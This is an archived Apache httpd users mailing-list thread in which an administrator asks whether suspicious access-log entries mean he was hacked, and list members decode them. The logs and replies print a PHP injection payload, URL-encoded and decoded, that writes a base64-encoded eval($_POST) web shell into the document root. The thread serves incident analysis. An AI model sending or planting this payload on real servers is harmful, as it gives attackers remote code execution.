httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Kent Frazier <frazier...@sbcglobal.net>
Subject Re: [users@httpd] am i hacked ?
Date Mon, 06 Feb 2017 20:06:12 GMT
If you have python installed...
The following python script shows some simple commands for decoding (for 
future reference).

test =""" 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
 > 
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 > HTTP/1.1" 200 90
 > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
 > 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
 > 
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 > HTTP/1.1" 200 90"""
import urllib.parse
print(urllib.parse.unquote(test))
import base64
print(base64.b64decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'))
********************************************************
It yields...
python unquote.py
  /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
'->|';file_put_contents($_SERVER['DOCUME
 > 
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo 
'|<-';
 > HTTP/1.1" 200 90
 > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
 > 
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo 
'->|';file_put_contents($_SERVER['DOCUME
 > 
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo 
'|<-';
 > HTTP/1.1" 200 90
b'<?php eval($_POST[1]);?>'
********************************************************
I also have a program that attempts to get an email address to notify in 
the event of abuse. It yields the following.

python getAbuseEmail.py 91.200.12.33
['noc@lugalink.net']

though it is unlikely you'll get a response ;-)


On 2/6/2017 8:36 AM, Jack Swan wrote:
> I didn't decode it all.  I'll leave the rest up to you, but the %characters are hexadecimal
characters.  Look up hex charset.
>
> So the first line translates to (I may have missed a char or two...)
>
> GET/?1=@ini_set("display_errors", 0);set_time_limit("0");@set_magic_quotes_runtime();echo
 '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
'|<-';
>
>
> ----- Original Message -----
> From: bernd.lentes@helmholtz-muenchen.de
> To: users@httpd.apache.org
> Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern
> Subject: [users@httpd] am i hacked ?
>
> Hi,
>
> just in the moment i found two very weird entries in may access_log:
>
> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
HTTP/1.1" 200 90
>
> What upsets me is that these two requests have statuscode 200, which mean it was successfull.
> The IP is from ukraine. Where can i find out what these %charcacters mean ? Does anyone
understand what happened here ? It's apache 2.2.3 64bit.
>
> Thanks for any hint.
>
> Bernd
>


---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message